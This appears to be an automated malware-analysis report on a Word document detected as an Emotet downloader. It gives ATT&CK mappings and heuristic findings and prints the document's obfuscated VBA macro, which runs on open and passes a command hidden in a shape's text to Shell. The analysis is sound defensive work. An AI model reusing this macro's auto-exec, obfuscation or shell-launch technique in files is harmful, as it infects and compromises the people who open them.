Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
- T1059.003 Windows Command Shell
The sample contains a VBA macro with an autoopen subroutine that invokes cmd.exe with a complex command. This command appears to be designed to download and execute a second-stage payload, as indicated by the presence of PowerShell references and the ClamAV detection for Emotet. The use of cmd.exe and PowerShell points to command execution, and the autoopen macro suggests a malicious document lure.
Heuristics (10)

- ClamAV: Doc.Downloader.Emotet-6780510-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6780510-1
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA. Matched line in script: `_ .Shell(fiuOmuVi, qHVGfkUWS), wYfdZPpjf) HFRToOqFALDwlwTF = (224706231 + Round(ajjsnlQBFUFBoRFoXRWPnLi) * 324377194 - SpDfRwlXqzziOR + (CmJWAwWltwZBiSEPCmpU / Tan(NWnXTdzRHKIzqMBBIzEwDKjs)))`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub autoopen() lFhWQUo`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4847 bytes |

SHA-256: 642af68338dd3b85054af97c2bf126db9d3172d404fa4ee5168d950fae71f323

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 142 of 173 identifiers look randomly generated (e.g. 'NWnXTdzRHKIzqMBBIzEwDKjs') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "OrRhjCEQYBWHER"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
lFhWQUo
End Sub

Attribute VB_Name = "WuXAvEX"
Function lFhWQUo()
On Error Resume Next
hTILiiEasCazojiHiBAzR = (265717628 + Round(sVmaBFmccElDdNJ) * 279658780 - mNSlYihCtNlziEPsM + (qvDCVFazuCjAuYKlM / Tan(WWUmFYHsBiuzVK)))
wTvLksMLaoiWsSMnz = 292065055
WdrUBmCpEHqLwVj = (226359617 + Round(jaJvmAsXGsOGzWlEplH) * 84533675 - OuzFQNFirUfwVmNSKjdzwv + (ojFkEHJkbVoSjJpWnmpPXjJ / Tan(jYmiBdNpTALWLcAbhkDb)))
UjJVNqMHfVFabAjUiiwH = 339112785
IbbrcwiDuUzhLSrGZjLwiY = (103593892 + Round(GwGChBqaiaFEsUOlpY) * 188876587 - rUwBWjomDYFjLG + (fscWtiXDlNnNEVaIJvOcl / Tan(FfBNDXFVVsljjt)))
CjXURLnjSjRcPvoz = 198988965
GRLBrXaiQHilaOQu = (283288209 + Round(HlHZopvjEGqfPjHuM) * 100974446 - wTiczKlTzzdNrzY + (JDhdWGLTTrlszdfBA / Tan(swdIKOCVzjatzhqSzrflm)))
IKJFZtWUUbMGFalBsSaBIis = 174499907
RCiStuzblwjpJDNONAQr = (129642150 + Round(IpfuikVjOuKjuiGLY) * 267006074 - uGsFrvuvrWRlwJAu + (mwLOGEkoiZJfIBbcdZKQjo / Tan(opdKwIOatnRYadzoCHQNVkQj)))
qJSjpiFwzWYctojPzP = 285516615
rToNpUfEVbhidvtEhOsZ = (233346116 + Round(nIqMFazZFSmTsFBi) * 237568522 - RhoJzEoWmQQNzKz + (jfWdOFFvWOrJCnDCimHB / Tan(dJmXjoiIrVbWMZVIGr)))
ctnkMfTwNOjLCvIC = 144366113
TwErSZVOhwvMrfbiCHWHjEm = (179487441 + Round(foDwCJjoiQSqBfZ) * 57100964 - llpHorhNFqiKLOLdlmlRPfn + (XNOInBbzzlSBlwrw / Tan(lwTAiSBGNPsnrfGwij)))
cYaDOlKZwKrnupvdiTK = 296641512
CFOdfDPDGmXhJwpJumwB = (305713998 + Round(EdBGEhTZrKavzLqCJL) * 298580586 - QHaSzWSNddCLljAl + (ZzhkhvMHNAiTrclHiFz / Tan(jGiPFwNHOKQKFb)))
MLcjLNLlVoulBREDbDirT = 111240274
zSpOvZBHGDKkLLEnYn = (155630660 + Round(DaKbZnQZVolCTcwjjQXRf) * 57483490 - zHuPrPwizBuRXHOoH + (blRSHRiNUDIPFEu / Tan(NTfYZKYGoAZLbbVb)))
JDWwizdhiusZhvpWM = 301663205
BKshzowBKbIsnBjiXBHiXKH = (103515116 + Round(VOOXiaPjCOVoZFvqN) * 153372170 - JonkdJdribVqCcOiakdcAsLk + (LpzwMsJnIGihdlOFjkFhYT / Tan(KbUFkuwQcDwRTfuS)))
LCuWkwzzPXRIGCNsinUrm = 167047239
Const qHVGfkUWS = 0
SpULqCFMdwhDvPftzoHm = (167557558 + Round(ojpCjWzuoaARzsKanBs) * 155512407 - QzGdpHZthhKGsAkWoTiNiH + (DiQmjXBGuBmXkiY / Tan(OZBHtqLHrZDziJJFJtDzYVq)))
jaQEFdAnPYTojAMMTJ = 306855654
zLOQbAsWkrNmriWY = (233440611 + Round(TWihcAlEqZzsRE) * 164268138 - CLluTFOlHFirtzzm + (GDIiPiNfWKTZrZJNhfLmo / Tan(NHwaXWuLtbKLLAQfmdYP)))
vvMQfVdLRmAsZpAhpLqkLRrO = 208735694
Set BYkrhO = OrRhjCEQYBWHER.Shapes(qVYIj + "tESslznR" + jPajCfCfM)
CROTWlMjYfSIrAAUt = (52119434 + Round(trQqCpZDHAjjZiYkCawLPiD) * 174218891 - clpjAOGjvHYlbMiwhFjr + (saTQwtzwfPopLZDjUHmazdbz / Tan(aOSOhYTifjLVTBUJkPrkvPma)))
MzwRzPwURXiihzqU = 48015641
nDTHuwzNnlpPJAUwwHEXf = (189752455 + Round(SdjVwYJdHkXWkYwYFdhdJEO) * 276182242 - luIIKACKLBdNbCpiH + (fldkawjzuwzjOPqFKiAVw / Tan(ULZWVKdbswBVjDlBTKZLG)))
LcnOWVrKimluRSL = 23292253
jcPwqBVfMzdbmNwhwOdjJB = (61755534 + Round(tQvTwvmRorVomTwjaCnLO) * 20398826 - WDiHAiVdfTfDZGBiR + (MmusHvfQwGGOzVpB / Tan(QOnmiTOpVGPYaYUVwCQ)))
iwmcklOWRVJOYjlUib = 193209678
ZjOmdmsPscwnAcudsT = (67697133 + Round(zJiZJzdFMIHUHYzshCzX) * 29499270 - zmjwYtwKzSHNTPwpciImCjUb + (bfBvpVnaCJvpNbkJBJpN / Tan(EiusZTORuQRIQwOuPJwUmRF)))
APCYdAaiOkWwGD = 103922595
fiuOmuVi = BYkrhO.TextFrame.TextRange + PmzssI + Htdhw + srKRpou + ujZRnLt + dJMYTTYC + FkiUN + amVcjU + mQEEbbFz + PAZDqzZ + dQTYrtn + KMJwIijC + mmUoXwFD
YvJuaRGFmtdMGdNYPrTS = (32776378 + Round(ntazUzDkrLNcMzTRw) * 9806046 - JdbOFkcdLvLhUYGI + (UdzICBBSzdQQEzsSH / Tan(oMiUNsUrpfdsEGpCzVDCHbZ)))
GGLMGzSPNdSwmzQFnKMWoGZK = 179591521
UFtYrQHmmXAvtjquijAVij = (330654234 + Round(NzZXAFFJiAjbjSlwpYLL) * 153120000 - cPaPiBZuKlHPKsrklhRqQtCP + (PuCjFYmGRXJwlWDj / Tan(qvURHtGEndtjfjMLBSHXN)))
MUItVhnzLOGfCH = 312604482
fZUIabwWilBRQrqzjYO = (173221070 + Round(WftSMYkijKNvZiXuuhYh) * 201443851 - TwdlPzIZjWjtJu + (qODNnwaoWqISCprqsBT / Tan(zobIlaJiqMfZdTDT)))
TqEtIHuGjFkpfqspid = 13586502
HRuIRXvntcWKfcNAm = (52658082 + Round(WfspklARYaHroPYKNfrPhTR) * 111390502 - FaGpNiUYsjjPbKWRGXNm + (hvGSAVvsKCObLiLtcKsnS / Tan(iovlUUwawDitXfzWNMYjhdVn)))
fLXiNVwSlMSXOAbuj = 41648165
SGftFzfPm = Array(FTHVoJ, wiijbmS, zwLzlwXK, Interaction _
_
_
_
_
_
_
_
.Shell(fiuOmuVi, qHVGfkUWS), wYfdZPpjf)
HFRToOqFALDwlwTF = (224706231 + Round(ajjsnlQBFUFBoRFoXRWPnLi) * 324377194 - SpDfRwlXqzziOR + (CmJWAwWltwZBiSEPCmpU / Tan(NWnXTdzRHKIzqMBBIzEwDKjs)))
DFlkusZzkpQVwjVZUllQCsG = 23349787
ZHERRTRWRiFaowWvoXQEj = (125718479 + Round(DDdWtTmkFhbrPLLfECVjRKk) * 304362306 - iEquuwwGMBOowXDiuAsNH + (kcrLBOmdsSilKPv / Tan(KldkDJzrHiSBWKrjibTOCj)))
jTiIvFLMojEqHkWDbfzEXvl = 44604557
End Function
```